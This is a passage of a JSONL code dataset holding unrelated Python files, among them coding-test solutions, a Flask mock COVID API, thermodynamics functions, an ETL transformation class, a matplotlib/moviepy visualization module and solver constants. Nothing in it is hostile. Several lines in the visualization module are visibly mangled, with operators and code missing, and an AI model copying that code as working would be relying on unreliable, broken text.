/ speeds[i] > days[-1]:\n            days.append(math.ceil(left / speeds[i]))\n        else:\n            days.append(days[-1])\n\n    answer = list(Counter(days).values())\n    return answer","repo_name":"ok701/coding_test","sub_path":"프로그래머스/lv2/42586. 
기능개발/기능개발.py","file_name":"기능개발.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3735338283","text":"import flask\nfrom flask import request, jsonify\nimport pandas as pd\nimport numpy as np\nimport time\nimport random\nimport math\n\ndata = pd.read_csv(\"./03-24-2020.csv\")\ndata = data.loc[data[\"Country_Region\"] == \"US\"]\n\ndef gen_response():\n obs = data.sample(200, replace = True, weights = \"Confirmed\")\n obs = obs.replace(np.nan, \"\", regex = True)\n\n current_time = math.floor(time.time())\n start_time = current_time - 1000 * 60 * 5\n\n obs[\"Positive\"] = [\"TRUE\" if random.random() < 0.4 else \"FALSE\" for i in range(200)]\n obs[\"Updated\"] = [random.randint(start_time, current_time) for i in range(200)]\n obs[\"Race\"] = [\"White\" if random.random() < .75 else \"Black\" if random.random() < .6 else \"Asian\" for i in range(200)]\n obs[\"Hispanic\"] = [\"TRUE\" if random.random() < .12 else \"FALSE\" for i in range(200)]\n obs[\"Age\"] = np.floor(np.random.normal(48, 12, 200))\n\n response = {}\n for i in range(200):\n response[i] = {\n \"County\": obs.iloc[i][\"Admin2\"],\n \"State\": obs.iloc[i][\"Province_State\"],\n \"Lat\": obs.iloc[i][\"Lat\"],\n \"Long\": obs.iloc[i][\"Long_\"],\n \"Positive\": obs.iloc[i][\"Positive\"],\n \"Updated\": int(obs.iloc[i][\"Updated\"])\n }\n\n return response\n\napp = flask.Flask(__name__)\n\n@app.route(\"/api\", methods=[\"GET\"])\n\ndef get_json():\n return jsonify({\"response\": gen_response()})\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"alexying2110/covid_vis","sub_path":"server_test/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11636885100","text":"first_string, second_string = input().split()\ntotal_sum = 0\nlonger_string = \"\"\nshorter_string = \"\"\nlen_to_multiply = 0\nrest_len = 0\n\nif len(first_string) > len(second_string):\n longer_string = first_string\n shorter_string = second_string\n\nelif len(second_string) > len(first_string):\n longer_string = second_string\n shorter_string = first_string\n\nelse: #equal\n longer_string = first_string\n shorter_string = second_string\n\ndiff = len(longer_string) - len(shorter_string)\n\nlen_to_multiply = len(longer_string) - diff\nrest_len = diff\nrest_word = longer_string[len(shorter_string):len(longer_string):]\n\nfor index in range(len_to_multiply):\n total_sum += ord(longer_string[index]) * ord(shorter_string[index])\n\nif rest_len:\n for index in range(rest_len):\n total_sum += ord(rest_word[index])\n\nprint(total_sum)\n","repo_name":"ahmedbuchev/SoftUni-Python","sub_path":"01.Fundamentals/09.text_processing/exercise/character_multiplier.py","file_name":"character_multiplier.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19358379525","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Functions related to water vapor and its thermodynamic effects\n\"\"\"\nimport numpy as np\n\nfrom typhon import constants\n\n\n__all__ = [\n 'e_eq_ice_mk',\n 'e_eq_water_mk',\n 'density',\n]\n\n\ndef e_eq_ice_mk(T):\n r\"\"\"Calculate the equilibrium water vapor pressure over ice.\n\n Equilibrium water vapor pressure over ice using Murphy and Koop 2005\n parameterization formula.\n\n .. 
math::\n \\ln(e_i) = 9.550426\n - \\frac{5723.265}{T}\n + 3.53068 \\cdot \\ln(T)\n - 0.00728332 \\cdot T\n\n Parameters:\n T (float or ndarray): Temperature in [K].\n\n Returns:\n float or ndarray: Equilibrium water vapor pressure over ice in [Pa].\n\n References:\n Murphy, D. M. and Koop, T. (2005): Review of the vapour pressures of\n ice and supercooled water for atmospheric applications,\n Quarterly Journal of the Royal Meteorological Society 131(608):\n 1539–1565. doi:10.1256/qj.04.94\n\n \"\"\"\n if np.any(T <= 0):\n raise Exception('Temperatures must be larger than 0 Kelvin.')\n\n # Give the natural log of saturation vapor pressure over ice in Pa\n e = 9.550426 - 5723.265 / T + 3.53068 * np.log(T) - 0.00728332 * T\n\n return np.exp(e)\n\n\ndef e_eq_water_mk(T):\n r\"\"\"Calculate the equilibrium water vapor pressure over water.\n\n Equilibrium water vapor pressure over water using Murphy and\n Koop 2005 parameterization formula.\n\n .. math::\n \\ln(e_w) &= 54.842763 - \\frac{6763.22}{T} - 4.21 \\cdot \\ln(T) \\\\\n &+ 0.000367 \\cdot T\n + \\tanh \\left(0.0415 \\cdot (T - 218.8)\\right) \\\\\n &\\cdot \\left(53.878 - \\frac{1331.22}{T}\n - 9.44523 \\cdot \\ln(T)\n + 0.014025 \\cdot T \\right)\n\n Parameters:\n T (float or ndarray): Temperature in [K].\n\n Returns:\n float or ndarray: Equilibrium water vapor pressure over water in [Pa].\n\n References:\n Murphy, D. M. and Koop, T. (2005): Review of the vapour pressures of\n ice and supercooled water for atmospheric applications,\n Quarterly Journal of the Royal Meteorological Society 131(608):\n 1539–1565. doi:10.1256/qj.04.94\n\n \"\"\"\n if np.any(T <= 0):\n raise Exception('Temperatures must be larger than 0 Kelvin.')\n\n # Give the natural log of saturation vapor pressure over water in Pa\n\n e = (54.842763\n - 6763.22 / T\n - 4.21 * np.log(T)\n + 0.000367 * T\n + np.tanh(0.0415 * (T - 218.8))\n * (53.878 - 1331.22 / T - 9.44523 * np.log(T) + 0.014025 * T))\n\n return np.exp(e)\n\n\ndef density(p, T, R=constants.gas_constant_dry_air):\n r\"\"\"Calculates gas density by ideal gas law.\n\n .. 
math::\n \\rho = \\frac{p}{R \\cdot T}\n\n Parameters:\n p (float or ndarray): Pressure [Pa.]\n T (float or ndarray): Temperature [K].\n If type of T and p is ndarray, size must match p.\n R (float): Gas constant [J K^-1 kg^-1].\n Default is gas constant for dry air.\n\n Returns:\n float or ndarray: Density [kg/m**3].\n\n See also:\n :mod:`typhon.constants`\n Module containing universal gas constant as well\n as gas constants for dry air and water vapor.\n\n Examples:\n >>> density(1013e2, 300)\n 1.1763056653021122\n \"\"\"\n return p / (R * T)\n","repo_name":"simonpf/furry-guacamole","sub_path":"typhon/physics/thermodynamics.py","file_name":"thermodynamics.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14770256218","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import permission_required\nfrom juntagrico.entity.member import Member\n\n\n@permission_required('badge.can_change')\ndef members_list(request):\n render_dict = {\n 'change_date_disabled': True,\n 'management_list': Member.objects.filter(badges__isnull=False).distinct()\n }\n return render(request, 'jbg/management_lists/badges.html', render_dict)\n","repo_name":"juntagrico/juntagrico-badges","sub_path":"juntagrico_badges/views_admin.py","file_name":"views_admin.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3441859343","text":"from DataSource import Extract\nimport json\nimport pandas as pd\nimport numpy as np \n\nclass Transformation:\n\n\tdef __init__(self):\n\t\textractObj = Extract()\n\n\t\t# load API data\n\t\tself.goal_data = extractObj.getAPISData('Goals')\n\t\tself.player_data = extractObj.getAPISData('Players')\n\t\tself.team_data = extractObj.getAPISData('Teams')\n\t\tself.games_data = extractObj.getAPISData('Games')\n\t\tself.rounds_data = extractObj.getAPISData('Rounds')\n\n\tdef GoalData(self):\n\t\t# list of columns to be added in a dataframe\n\t\tid_=[]\n\t\tperson_id=[]\n\t\tgame_id =[]\n\t\tteam_id = []\n\t\tpenalty = []\n\t\towngoal = []\n\t\tminute=[]\n\t\tteam_score=[]\n\t\topponent_score=[]\n\t\t# function to append data into lists\n\t\tdef append_goal_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\tperson_id.append(dict_['person_id'])\n\t\t\tgame_id.append(dict_['game_id'])\n\t\t\tteam_id.append(dict_['team_id'])\n\t\t\tpenalty.append(dict_['penalty'])\n\t\t\towngoal.append(dict_['owngoal'])\n\t\t\tminute.append(dict_['minute'])\n\t\t\tteam_score.append(dict_['score1'])\n\t\t\topponent_score.append(dict_['score2'])\n\t\t#extract dictionary from string and append it in a list\n\t\tmy_list = self.goal_data.split('\\n') \n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_goal_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_goal_data(dict_)\n\t\t\t\t\n\t\t# create dataframe using lists \n\t\tself.data_csv = pd.DataFrame({'id':id_,'person_id':person_id,'game_id':game_id,'team_id':team_id,\n\t\t\t'penalty':penalty,'owngoal':owngoal,'minute':minute,'team_score':team_score,\n\t\t\t'opponent_score':opponent_score})\n\t\treturn self.data_csv #return a dataframe\n\n\tdef PlayerData(self):\n\t\tid_=[]\n\t\tname=[]\n\t\tdef append_player_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\tname.append(dict_['name'])\n\t\tmy_list = 
self.player_data.split('\\n')\n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_player_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_player_data(dict_)\n\t\tself.data_csv = pd.DataFrame({'id':id_,'name':name})\t\t\n\t\treturn self.data_csv\n\t\t\n\tdef TeamData(self):\n\t\tid_=[]\n\t\ttitle=[]\n\t\tdef append_team_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\ttitle.append(dict_['title'])\n\t\tmy_list = self.team_data.split('\\n')\n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_team_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_team_data(dict_)\n\t\tself.data_csv = pd.DataFrame({'id':id_,'title':title})\n\t\treturn self.data_csv\n\n\tdef GameData(self):\n\t\tid_=[]\n\t\tteam1_id=[]\n\t\tteam2_id=[]\n\t\tknockout = []\n\t\tround_id = []\n\t\tdef append_game_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\tteam1_id.append(dict_['team1_id'])\n\t\t\tteam2_id.append(dict_['team2_id'])\n\t\t\tknockout.append(dict_['knockout'])\n\t\t\tround_id.append(dict_['round_id'])\n\t\tmy_list = self.games_data.split('\\n')\n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_game_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_game_data(dict_)\n\t\tself.data_csv = pd.DataFrame({'id':id_,'team1_id':team1_id,'team2_id':team2_id,'knockout':knockout,\n\t\t\t'round_id':round_id})\n\t\treturn self.data_csv\n\n\tdef RoundsData(self):\n\t\tid_=[]\n\t\ttitle=[]\n\t\tdef append_round_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\ttitle.append(dict_['title'])\n\t\tmy_list = self.rounds_data.split('\\n')\n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_round_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_round_data(dict_)\n\t\tself.data_csv = pd.DataFrame({'id':id_,'title':title})\n\t\treturn self.data_csv\n\n#test run\n# Transformation().GoalData()\n# Transformation().GameData()\n# Transformation().PlayerData()\n# Transformation().RoundsData()\n# Transformation().TeamData()\n\n# print('Successfully Transformed')\n\n\n","repo_name":"gitSuyash/Fifa-ETL-Analysis","sub_path":"Transformation/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}\n{"seq_id":"32179419740","text":"# Write a program to implement dda algorithm\r\nfrom matplotlib import pyplot as plt\r\nx1=int(input(\"Enter x1: \")) \r\ny1=int(input(\"Enter y1: \")) \r\nx2=int(input(\"Enter x2: \")) \r\ny2=int(input(\"Enter y2: \")) \r\ndx=x2-x1 \r\ndy=y2-y1\r\nm=dy/dx\r\nlx=[]\r\nly=[]\r\nwhile(x1<=x2):\r\n lx.append(x1)\r\n ly.append(y1)\r\n x1=x1+1\r\n y1=y1+m  # y advances by the slope m for each unit step in x\r\nplt.plot(lx,ly)\r\nplt.xlim(0,200)\r\nplt.ylim(0,200)\r\nplt.xlabel(\"X-axis\")\r\nplt.ylabel(\"Y-axis\")\r\nplt.title(\"DDA Line Drawing Algorithm\")\r\nplt.show()\r\n","repo_name":"Abhishek0012/Computer-Graphics","sub_path":"File/dda.py","file_name":"dda.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}\n{"seq_id":"23861409938","text":"from sys import *\ninput = stdin.readline\nimport math\nfrom 
collections import Counter\n\ns = input()\narr = Counter(list(s.strip()))\n\n# The divisor must be the gcd of *all* character counts, so compute it over the\n# whole Counter first; dividing by a running gcd inside the build loop would use\n# a stale divisor for the earlier characters.\ncc = 0\nfor k in arr:\n    cc = math.gcd(arr[k], cc)\nif cc == 1:\n    print(\"IMPOSSIBLE\")\nelse:\n    ans = []\n    for k in arr:\n        ans.append(k*(arr[k]//cc))\n    print(''.join(ans))","repo_name":"35C4n0r/Codeforces-Py-","sub_path":"PycharmProjects/mBit 2020/Pok´emon Permutation.py","file_name":"Pok´emon Permutation.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}\n{"seq_id":"5169476879","text":"import unittest\nfrom app import create_app, db\nfrom app.models import User, AnonymousUser, Role, Permission\n\n\nclass UserModelTestCase(unittest.TestCase):\n    # More tests are coming\n    def setUp(self):\n        self.app = create_app('testing')\n        self.app_context = self.app.app_context()\n        self.app_context.push()\n        db.create_all()\n        Role.insert_roles()\n\n    def tearDown(self):\n        db.session.remove()\n        db.drop_all()\n        self.app_context.pop()\n\n    def test_roles_and_permissions(self):\n        Role.insert_roles()\n        u = User(email='john@example.com')\n        self.assertTrue(u.can(Permission.VIEW_CONTACTS))\n        self.assertFalse(u.can(Permission.MODERATE))\n\n    def test_anonymous_user(self):\n        u = AnonymousUser()\n        self.assertFalse(u.can(Permission.VIEW_CONTACTS))","repo_name":"agladyshev/FSND-brewlocker","sub_path":"tests/test_user_model.py","file_name":"test_user_model.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}\n{"seq_id":"14250144716","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\nimport numpy as np\nimport os\n# importing movie py libraries\nfrom moviepy.editor import VideoClip, clips_array\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nfrom utils import json_to_projectedPoints, json_to_annot, json_to_detection\nimport seaborn as sns\nfrom matplotlib.collections import PolyCollection\n\n###############################################################################################\n#\n# Help functions for visualization\n#\n###############################################################################################\n#plot_colors = ['blue','orange','green','red','purple','brown','pink','gray','olive','cyan']\nplot_colors = sns.color_palette()[:7]+sns.color_palette()[8:]\n\nvesselID2Color = {}\nvessel_count = 0\ndrop_frames3 = []\n\ndef get_color(vesselID):\n    global vesselID2Color\n    global vessel_count\n    global plot_colors\n    if vesselID in vesselID2Color.keys():\n        return vesselID2Color[vesselID]\n    color_index = vessel_count % len(plot_colors)\n    vessel_count += 1\n    vesselID2Color[vesselID] = plot_colors[color_index]\n    return vesselID2Color[vesselID]\n\ndef get_dict_item(dict, key):\n    try:\n        return dict[key]\n    except KeyError:\n        try:\n            return dict[str(key)]\n        except KeyError:\n            try:\n                return dict[float(key)]\n            except KeyError:\n                return dict[int(key)]\n\ndef map_timestamp_to_video_time(time_stamps, fps, duration):\n    '''\n    Input:\n    - all_projected_points (dict): {time_step: {vesselID: [ProjectedPoint1,..., ProjectedPoint8]}}\n    - image_bound: (xmax, ymax)\n    '''\n    frames = {}\n    idiot_time = 0.0\n    for t in time_stamps:\n        frames[round(idiot_time,3)] = t\n        idiot_time += 1/fps\n        if idiot_time > duration:\n            return frames\n    return frames\n    \n###############################################################################################\n#\n# Dynamic scene 
visualization\n#\n###############################################################################################\n\n\ndef visualize_dynamic_scene_mov(vessels, folder_path='./gifs/', figsize=(6, 6), y_x_lim=400, fps=3, max_time_steps=None):\n '''\n Creates the plot image for the given time step\n Input:\n - t (int): current time step\n - vessels (array): List of vessels in the scene\n - figsize (int): Size of figure\n - y_x_lim (int): limitation of x and y axis\n '''\n fig, ax = plt.subplots(figsize=figsize)\n\n time_stamps = vessels[0].get_track().get_time_stamps()\n duration = int(len(time_stamps)/fps) # Because of the idiot FPS that i can't change!!!!\n if max_time_steps and int(max_time_steps/fps)0 and 0<= point.image_coordinate[0] <= image_bounds[0] and 0<= point.image_coordinate[1] <= image_bounds[1]\n for vesselID, points in projected_points.items():\n for point in points:\n if point_in_image(point): \n vessels.append(vesselID)\n break\n return vessels\n\ndef find_frames_pps_multiple_cameras(cameraIDs, all_projected_points, image_bounds, display_when_min_vessels, fps, max_time_steps):\n '''\n Input:\n - all_projected_points (dict): {time_step: {vesselID: [ProjectedPoint1,..., ProjectedPoint8]}}\n - image_bound: (xmax, ymax)\n '''\n frames_cam = {cameraID: {} for cameraID in cameraIDs}\n idiot_time = 0.0\n for t in all_projected_points[cameraIDs[0]].keys():\n vessels_in_image = 0 \n for cameraID in cameraIDs:\n vessels_in_image_cam = vessels_in_view_pps(all_projected_points[cameraID][t], image_bounds[cameraID])\n if len(vessels_in_image_cam) > vessels_in_image:\n vessels_in_image = len(vessels_in_image_cam)\n if vessels_in_image >= display_when_min_vessels:\n frame_time = round(idiot_time,3)\n for cameraID in cameraIDs:\n frames_cam[cameraID][frame_time] = {'time': t, 'pps': all_projected_points[cameraID][t]}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps= display_when_min_vessels:\n frames[round(idiot_time,3)] = {'time': t, 'pps': pps}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps=0])\n vessel_y = np.array([point.image_coordinate[1] for point in pps if point.depth>=0])\n ax.plot(vessel_x, vessel_y, 'o')\n #ax.fill_between(vessel_x, vessel_y, color='grey', alpha=0.5)\n # Order of cornerpoints (length, beam, height): \n # Front back lower, back back lower, \n # back front lower, front front lower, \n # Front back upper, back back upper, \n # back front upper, front front upper,\n if show_box and vessel_x.size == 8:\n xs = list(vessel_x[0:4])+[vessel_x[0]]+list(vessel_x[4:])+[vessel_x[4]]\n ys = list(vessel_y[0:4])+[vessel_y[0]]+list(vessel_y[4:])+[vessel_y[4]]\n ax.plot(xs, ys, 'k-')\n ax.plot([vessel_x[1], vessel_x[5]], [vessel_y[1], vessel_y[5]], 'k-')\n ax.plot([vessel_x[2], vessel_x[6]], [vessel_y[2], vessel_y[6]], 'k-')\n ax.plot([vessel_x[3], vessel_x[7]], [vessel_y[3], vessel_y[7]], 'k-')\n\n # Define the colors for each face\n grey_color = (0.7019607843137254, 0.7019607843137254, 0.7019607843137254)\n\n # Define the indices of the cube vertices that form each face\n face_indices = [[0, 1, 2, 3, 0], # Front face\n [1, 2, 6, 5, 1], # Right face\n [2, 3, 7, 6, 2], # Back face\n [3, 0, 4, 7, 3], # Left face\n [0, 1, 5, 4, 0], # Bottom face\n [4, 5, 6, 7, 4]] # Top face\n\n # Fill each face of the cube with a different color\n for indices in face_indices:\n face_x = [vessel_x[i] for i in indices]\n face_y = [vessel_y[i] for i in indices]\n ax.fill(face_x, face_y, color=grey_color, alpha=0.5)\n #ax.fill_between([xs[6], xs[5], xs[4], xs[7], 
xs[6]], [ys[6], ys[5], ys[4], ys[7], ys[6]], color='grey', alpha=0.5)\n #ax.fill_between([xs[6], xs[5]], [ys[6], ys[5]], color='red', alpha=0.5)\n #ax.fill_between([xs[0],xs[2]], [ys[0], ys[2]], color='green', alpha=0.5)\n #ax.fill_between([xs[1],xs[3]], [ys[1], ys[3]], color='orange', alpha=0.5)\n #ax.fill_between(xs[2:], ys[2:], color='yellow', alpha=0.5)\n #ax.fill_between(xs, ys, color='grey', alpha=0.5)\n #l = [[[xs[0], ys[0]], [xs[1], ys[1]]], [[xs[0], ys[0]], [xs[3], ys[3]]], [[xs[0], ys[0]], [xs[4], ys[4]]], [[xs[1], ys[1]], [xs[2], ys[2]]], [[xs[1], ys[1]], [xs[5], ys[5]]],[[xs[2], ys[2]], [xs[3], ys[3]]],[[xs[2], ys[2]], [xs[6], ys[6]]], [[xs[3], ys[3]], [xs[7], ys[7]]],[[xs[4], ys[4]], [xs[5], ys[5]]]]\n #pc2 = PolyCollection(l, facecolors='red', edgecolor=\"k\", alpha=0.9)\n #ax.add_collection(pc2)\n #ax.fill(pc2, facecolor='red')\n \n ax.set_xlim([0,image_bounds[0]])\n ax.set_ylim([image_bounds[1],0])\n ax.set_ylabel('y', fontsize = 14, rotation = 0, labelpad=10)\n ax.xaxis.tick_top()\n ax.set_xlabel('x', fontsize = 14) \n ax.xaxis.set_label_position('top') \n ax.tick_params(labelsize=ticks_fontsize)\n ax.set_title(f'Projected points at time {round(float(t)*frequency,1)}', fontsize=fontsize)\n\n # returning numpy image\n return mplfig_to_npimage(fig)\n \n # creating animation\n duration = int(len(frames)/fps) # Because of the idiot FPS that i can't change!!!!\n if max_time_steps and max_time_steps/fps1:\n final = clips_array([clips])\n filepath = os.path.join(folder_path, f'projectedPoints.mp4')\n final.write_videofile(filepath,fps=fps)\n###############################################################################################\n#\n# Bounding box visualization\n#\n###############################################################################################\ndef vessels_in_view_anns(annotations, image_bounds):\n '''\n Input:\n - annotations (dict): {vesselID: {label: string, 'bbox': BoundingBox}}\n - image_bound: (xmax, ymax)\n '''\n vessels = []\n def point_in_image(x, y):\n return 0<= x <= image_bounds[0] and 0<= y <= image_bounds[1]\n for vesselID, ann in annotations.items():\n xpoints, ypoints = ann['bbox'].get_points_for_visualizing()\n for i in range(len(xpoints)):\n if point_in_image(xpoints[i],ypoints[i]) and ann['bbox'].depth >= 0: \n vessels.append(vesselID)\n break\n return vessels\n\ndef find_frames_anns(annotations, image_bounds, display_when_min_vessels, fps, max_time_steps):\n '''\n Input:\n - annotations (dict): {vesselID: {label: string, 'bbox': BoundingBox}}\n - image_bound: (xmax, ymax)\n - display_when_min_vessels (int)\n '''\n frames = {}\n idiot_time = 0.0\n for t, anns in annotations.items():\n vessels_in_image = vessels_in_view_anns(anns, image_bounds)\n if len(vessels_in_image) >= display_when_min_vessels:\n frames[round(idiot_time,3)] = {'time': t, 'anns': anns}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps vessels_in_image:\n vessels_in_image = len(vessels_in_image_cam)\n if vessels_in_image >= display_when_min_vessels:\n frame_time = round(idiot_time,3)\n for cameraID in cameraIDs:\n frames_cam[cameraID][frame_time] = {'time': t, 'anns': annotations[cameraID][t]}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps1:\n final = clips_array([clips])\n filepath = os.path.join(folder_path, f'annotations.mp4')\n final.write_videofile(filepath,fps=fps)\n\n\n\n###############################################################################################\n#\n# Distorted Bounding box 
visualization\n#\n###############################################################################################\n\ndef find_frames_detections(detections, annotations, image_bounds, display_when_min_vessels, fps, max_time_steps):\n '''\n Input:\n - detections (dict): {vesselID: {label: string, 'bbox': BoundingBox, confidenceScore: float}}\n - image_bound: (xmax, ymax)\n - display_when_min_vessels (int)\n '''\n frames = {}\n idiot_time = 0.0\n if not annotations:\n # Include all frames\n for t, detections in detections.items():\n frames[round(idiot_time,3)] = {'time': t, 'detections': detections}\n idiot_time += 1/fps\n return frames\n for t, detections in detections.items():\n vessels_in_image = vessels_in_view_anns(annotations[t], image_bounds)\n if len(vessels_in_image) >= display_when_min_vessels:\n frames[round(idiot_time,3)] = {'time': t, 'detections': detections}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps vessels_in_image:\n vessels_in_image = len(vessels_in_image_cam)\n if vessels_in_image >= display_when_min_vessels:\n frame_time = round(idiot_time,3)\n for cameraID in cameraIDs:\n frames_cam[cameraID][frame_time] = {'time': t, 'detections': detections[cameraID][t]}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps1:\n final = clips_array([clips])\n filepath = os.path.join(folder_path, f'detections.mp4')\n final.write_videofile(filepath,fps=fps)\n","repo_name":"andreajessen/MODSIM","sub_path":"src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":36602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9477388008","text":"\nimport numpy as np\ndef extract_data(filename,num_images,IMAGE_WIDTH):\n print('Extracting',filename)\n with open(filename,'rb') as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_WIDTH*IMAGE_WIDTH*num_images)\n data = np.frombuffer(buf,dtype=np.uint8).astype(np.float)\n data = data.reshape(num_images,IMAGE_WIDTH * IMAGE_WIDTH)\n return data\n\n\n\n\ndef extract_labels(filename,num_images):\n print('Extracting',filename)\n with open(filename,'rb') as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf,dtype=np.uint8).astype(np.int64)\n return labels\n\n","repo_name":"recharbao/machine-learning","sub_path":"CNN/extractData/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38063770587","text":"import math\n\nMIN, MAX = map(int, input().split(' '))\n\nnum = [True] * (MAX - MIN + 1)\ncount = 0\nN = 1\n\nwhile N * N <= MAX:\n N += 1\n square = N * N\n i = MIN // square\n\n while square * i <= MAX:\n idx = square * i - MIN\n if idx >= 0 and num[idx]:\n count += 1\n num[idx] = False\n i += 1\nprint(len(num) - count)\n","repo_name":"shg9411/algo","sub_path":"algo_py/boj/bj1016.py","file_name":"bj1016.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"8770039189","text":"import docplex.cp.utils as utils\nfrom docplex.cp.utils import *\nfrom docplex.cp.expression import CpoVariable, CpoIntVar, CpoFloatVar, CpoIntervalVar, CpoSequenceVar, CpoStateFunction, \\\n INT_MIN, INT_MAX, INTERVAL_MIN, INTERVAL_MAX, POSITIVE_INFINITY, NEGATIVE_INFINITY, \\\n _domain_iterator, _domain_min, _domain_max, _domain_contains, \\\n compare_expressions\nfrom 
docplex.cp.parameters import CpoParameters\nimport types\nfrom collections import OrderedDict\nimport functools\n\n\n###############################################################################\n## Constants\n###############################################################################\n\n# Solve status: Unknown\nSOLVE_STATUS_UNKNOWN = \"Unknown\"\n\n# Solve status: Infeasible\nSOLVE_STATUS_INFEASIBLE = \"Infeasible\"\n\n# Solve status: Feasible\nSOLVE_STATUS_FEASIBLE = \"Feasible\"\n\n# Solve status: Optimal\nSOLVE_STATUS_OPTIMAL = \"Optimal\"\n\n# Solve status: Job aborted\nSOLVE_STATUS_JOB_ABORTED = \"JobAborted\"\n\n# Solve status: Job failed\nSOLVE_STATUS_JOB_FAILED = \"JobFailed\"\n\n# List of all possible solve statuses\nALL_SOLVE_STATUSES = (SOLVE_STATUS_UNKNOWN,\n SOLVE_STATUS_INFEASIBLE, SOLVE_STATUS_FEASIBLE, SOLVE_STATUS_OPTIMAL,\n SOLVE_STATUS_JOB_ABORTED, SOLVE_STATUS_JOB_FAILED)\n\n\n# Fail status: Unknown\nFAIL_STATUS_UNKNOWN = \"Unknown\"\n\n# Fail status: Failed normally\nFAIL_STATUS_FAILED_NORMALLY = \"SearchHasFailedNormally\"\n\n# Fail status: Not failed (success)\nFAIL_STATUS_HAS_NOT_FAILED = \"SearchHasNotFailed\"\n\n# Fail status: Stopped by abort\nFAIL_STATUS_ABORT = \"SearchStoppedByAbort\"\n\n# Fail status: Stopped by exception\nFAIL_STATUS_EXCEPTION = \"SearchStoppedByException\"\n\n# Fail status: Stopped by exit\nFAIL_STATUS_EXIT = \"SearchStoppedByExit\"\n\n# Fail status: Stopped by label\nFAIL_STATUS_LABEL = \"SearchStoppedByLabel\"\n\n# Fail status: Stopped by time limit\nFAIL_STATUS_TIME_LIMIT = \"SearchStoppedByLimit\"\n\n# Fail status: Search completed\nFAIL_STATUS_SEARCH_COMPLETED = \"SearchCompleted\"\n\n# List of all possible search statuses\nALL_FAIL_STATUSES = (FAIL_STATUS_UNKNOWN,\n FAIL_STATUS_FAILED_NORMALLY, FAIL_STATUS_HAS_NOT_FAILED,\n FAIL_STATUS_ABORT, FAIL_STATUS_EXCEPTION, FAIL_STATUS_EXIT, FAIL_STATUS_LABEL,\n FAIL_STATUS_TIME_LIMIT, FAIL_STATUS_SEARCH_COMPLETED)\n\n\n# Search status: Not started\nSEARCH_STATUS_NOT_STARTED = \"SearchNotStarted\"\n\n# Search status: Ongoing\nSEARCH_STATUS_ONGOING = \"SearchOngoing\"\n\n# Search status: Completed\nSEARCH_STATUS_COMPLETED = \"SearchCompleted\"\n\n# Search status: Stopped. 
